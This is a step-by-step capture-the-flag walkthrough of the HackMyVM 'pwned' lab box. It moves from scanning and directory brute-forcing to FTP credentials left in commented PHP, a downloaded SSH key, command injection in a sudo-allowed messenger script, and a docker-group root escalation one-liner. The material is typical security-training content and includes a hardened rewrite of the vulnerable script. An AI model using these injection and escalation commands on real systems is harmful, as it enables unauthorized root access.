HackMyVM: pwned Box Detailed Walkthrough (WP)
城南花已开

Information Gathering

Service Discovery

Three open ports were found here.

```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:9d:ee:5e (Unknown)
192.168.56.121 08:00:27:36:b4:97 (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.887 seconds (135.67 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.121
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:00 EDT
Nmap scan report for 192.168.56.121
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
```

Let's start with the first one, FTP. It turns out anonymous login is not allowed.

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.3)
Name (192.168.56.121:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp>
```

Next, try the web service.

[image]

However, when you curl the page you will find another hint left for you in the source.

```
<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->
```

Let's brute-force directories; there may be an unexpected find.

```
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.56.121 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,png,html,zip,bak


___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.121
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, png, html, zip, bak]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 16l 27w 194c http://192.168.56.121/nothing/nothing.html
200 GET 75l 191w 3065c http://192.168.56.121/
200 GET 75l 191w 3065c http://192.168.56.121/index.html
200 GET 4l 7w 41c http://192.168.56.121/robots.txt
[####################] - 3m 28380/28380 0s found:4 errors:0
[####################] - 3m 28368/28368 176/s http://192.168.56.121/
[####################] - 0s 28368/28368 1493053/s http://192.168.56.121/nothing/ => Directory listing
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.121/nothing/nothing.html
<!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>

<h1>i said nothing bro</h1>
<p></p>

<!--I said nothing here. you are wasting your time i don't lie-->


</body>
</html>
```

There is a "nothing" directory; curl it and, hah, it really is nothing. I tried a few other wordlists, but my Kali scans far too slowly, so I looked at someone else's WP and found a hidden_text directory, served as a 301 redirect.

```
/nothing              (Status: 301) [Size: 312] [--> http://192.168.56.121/nothing/]
/server-status (Status: 403) [Size: 276]
/hidden_text (Status: 301) [Size: 316] [--> http://192.168.56.121/hidden_text/]
```

[image]

There is a file called secret.dic, most likely a directory wordlist. Download it with wget and rescan the directories with it.

```
┌──(kali㉿kali)-[~]
└─$ wget 192.168.56.121/hidden_text/secret.dic
--2024-10-15 03:49:31-- http://192.168.56.121/hidden_text/secret.dic
Connecting to 192.168.234.1:7891... connected.
Proxy request sent, awaiting response... 200 OK
Length: 211
Saving to: ‘secret.dic’

secret.dic 100%[=================================================>] 211 --.-KB/s in 0s

2024-10-15 03:49:31 (5.81 MB/s) - ‘secret.dic’ saved [211/211]
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.56.121 -w secret.dic -x txt

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.121
🚀 Threads │ 50
📖 Wordlist │ secret.dic
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 16l 27w 194c http://192.168.56.121/nothing/nothing.html
301 GET 9l 28w 321c http://192.168.56.121/pwned.vuln => http://192.168.56.121/pwned.vuln/
200 GET 75l 191w 3065c http://192.168.56.121/
[####################] - 1s 48/48 0s found:3 errors:0
[####################] - 0s 22/22 282/s http://192.168.56.121/
[####################] - 0s 22/22 2444/s http://192.168.56.121/nothing/ => Directory listing
[####################] - 0s 22/22 314/s http://192.168.56.121/pwned.vuln/
```

There is a pwned.vuln directory; it serves a login POST form. Ha, the username and password are written in a commented-out PHP block, and the page itself also gives a hint.

```
┌──(kali㉿kali)-[~]
└─$ curl 192.168.56.121/pwned.vuln/
<!DOCTYPE html>
<html>
<head>
<title>login</title>
</head>
<body>
<div id="main">
<h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
<form method="POST">
Username <input type="text" name="username" class="text" autocomplete="off" required>
Password <input type="password" name="password" class="text" required>
<input type="submit" name="submit" id="sub">
</form>
</div>
</body>
</html>




<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>
```

Logging in with these credentials does not lead to any further page, though. The username is obviously ftpuser, so, recalling the FTP service found earlier, let's try them on FTP.

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.3)
Name (192.168.56.121:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||57341|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||56034|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||55760|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |***************************************************************************| 2602 28.19 MiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (1.89 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||55468|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***************************************************************************| 75 711.08 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (65.74 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||61692|)
150 Here comes the directory listing.
drwxrwx--- 4 1000 1000 4096 Jul 10 2020 ariana
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ftpuser
-rwxr-xr-x 1 0 0 367 Jul 10 2020 messenger.sh
drwxrwx--- 3 1001 0 4096 Jul 10 2020 selena
226 Directory send OK.
ftp> get messenger.sh
local: messenger.sh remote: messenger.sh
229 Entering Extended Passive Mode (|||32849|)
150 Opening BINARY mode data connection for messenger.sh (367 bytes).
100% |***************************************************************************| 367 3.97 MiB/s 00:00 ETA
226 Transfer complete.
367 bytes received in 00:00 (312.46 KiB/s)
ftp> exit
┌──(kali㉿kali)-[~]
└─$ cat messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "

$msg 2> /dev/null

echo ""
echo "Message sent to $name :) "
echo ""
```

The ftpuser account has a share directory containing a note and a private key, and the FTP root turns out to be /home, from which I also grabbed a messenger.sh script. Whether it is useful or not, get it first 🤣

```
┌──(kali㉿kali)-[~/temp]
└─$ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(


┌──(kali㉿kali)-[~/temp]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
```

The note says ariana won't be happy, so this is most likely ariana's private key.

Escalating to the ariana user

```
┌──(kali㉿kali)-[~/temp]
└─$ ssh ariana@192.168.56.121 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$
ariana@pwned:~$ ls
ariana-personal.diary user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root
```

Sure enough, it logged in without any trouble.

Sudo privilege escalation

```
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
```

ariana may run messenger.sh as the selena user. We have already read this script above, so command injection is worth a try: run the script with sudo and type bash as the message to get a bash shell as selena.

```
ariana@pwned:~$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : bash

Enter message for bash :bash

Sending message to bash
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
whoami
selena
/usr/bin/script -qc /bin/bash /dev/null ## upgrade to an interactive shell
selena@pwned:~$ ls
selena-personal.diary user2.txt
selena@pwned:~$ cat user2.txt
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
```

```
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "

$msg 2> /dev/null
```

The script expands $msg unquoted on a command line, so whatever you type as the message is executed. Entering bash runs bash 2> /dev/null: standard error is redirected to /dev/null, so it is discarded rather than shown on the terminal or written to a file. In other words, any error messages the command produces go to the null device and the user never sees them, but the shell itself runs, as selena.
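For contrast, here is a hardened rewrite of the messenger.sh idea as an added example (not the box's own script): the username is validated against the passwd file and the message is written as data with printf, never expanded as a command. The SPOOL directory, the helper names and the embedded passwd lines are all constructed for the demo.

```bash
#!/bin/bash
# Hardened rewrite of the messenger.sh idea (added example, not the box's script).
# The original expands $msg unquoted as a command; here username and message are
# treated strictly as data. SPOOL is an assumed, constructed spool directory.
SPOOL="${SPOOL:-/tmp/messenger-demo-spool}"

# Print users whose home is under /home, read from a passwd-format file
# (field 6), instead of the original's grep/cut over whole lines.
list_users() {
    awk -F: '$6 ~ /^\/home\//{print $1}' "${1:-/etc/passwd}"
}

# deliver_message <passwd-file> <user> <message>
# Returns 0 and appends the message to the user's spool file only if <user>
# is a well-formed name that exists in the passwd file; returns 1 otherwise.
# The message is written with printf '%s' and never evaluated.
deliver_message() {
    local passwd_file="$1" name="$2" msg="$3"
    # Allow only portable username characters: no spaces, slashes or metacharacters.
    case "$name" in
        ''|*[!a-z_0-9-]*) return 1 ;;
    esac
    # The original never checked that the target user exists; this does.
    list_users "$passwd_file" | grep -qx -- "$name" || return 1
    mkdir -p "$SPOOL"
    printf '%s\n' "$msg" >> "$SPOOL/$name"
}

# Constructed passwd lines mirroring the three users seen on the box.
demo_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
ariana:x:1000:1000::/home/ariana:/bin/bash
selena:x:1001:1001::/home/selena:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/usr/sbin/nologin
EOF
}

# Demo: the message "bash" is stored verbatim rather than executed, and a
# path-traversal style username is rejected. Prints the stored message.
demo_run() {
    local f
    f=$(mktemp)
    demo_passwd > "$f"
    deliver_message "$f" selena 'bash' || return 1
    deliver_message "$f" '../../etc/passwd' 'x' && return 1
    tail -n1 "$SPOOL/selena"
}
```

Had the original script been written this way, typing bash as the message would have left a one-line file in the spool instead of opening a shell as selena.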

Running id, however, shows that selena is a member of a docker group.

You can also see it in /etc/group:

```
selena@pwned:~$ cat /etc/group
root:x:0:
daemon:x:1:
tty:x:5:
--------------- (lines in between omitted)
ssh:x:113:
ariana:x:1000:
systemd-coredump:x:999:
ssl-cert:x:114:
selena:x:1001:
docker:x:115:selena # here it is
ftp:x:116:
ftpuser:x:1002:
```

Root privilege escalation

Shell escalation

Here we escalate via docker group membership.

[image]

```
selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# pwd
/
# cd /root
# ls
root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c



You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm ajs_walker

Twitter Ajs_walker
```

docker run creates and starts a container. The -v /:/mnt option mounts the host's root directory (/) at /mnt inside the container, so the container can access the host's entire filesystem. --rm removes the container when it exits, and -it runs it interactively with a terminal attached.

Next comes the image to use, alpine, a lightweight Linux distribution. Then chroot /mnt sh changes the process's root directory to /mnt, which is the host's root filesystem, and starts a shell there. Because the docker daemon runs as root, anyone in the docker group can do this, which is why docker group membership is effectively root access.

Done, flag obtained 😎
